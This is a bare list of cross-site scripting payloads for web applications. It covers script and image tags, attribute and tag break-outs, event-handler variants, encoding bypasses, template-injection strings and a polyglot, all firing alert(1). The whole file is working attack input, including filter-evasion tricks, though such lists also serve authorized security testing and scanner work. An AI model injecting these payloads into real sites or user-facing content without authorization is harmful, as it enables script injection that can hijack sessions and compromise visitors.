# XSS Payloads
# Basic reflected
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
# Attribute injection
" onmouseover="alert(1)
' onmouseover='alert(1)
" onfocus="alert(1)" autofocus="
# Tag injection
"><script>alert(1)</script>
'><script>alert(1)</script>
</title><script>alert(1)</script>
</textarea><script>alert(1)</script>
# Event handlers
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
# Encoding bypass
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert&#40;1&#41;>
<svg/onload=alert(1)>
# Template literal
${alert(1)}
{{constructor.constructor('alert(1)')()}}
# Polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//
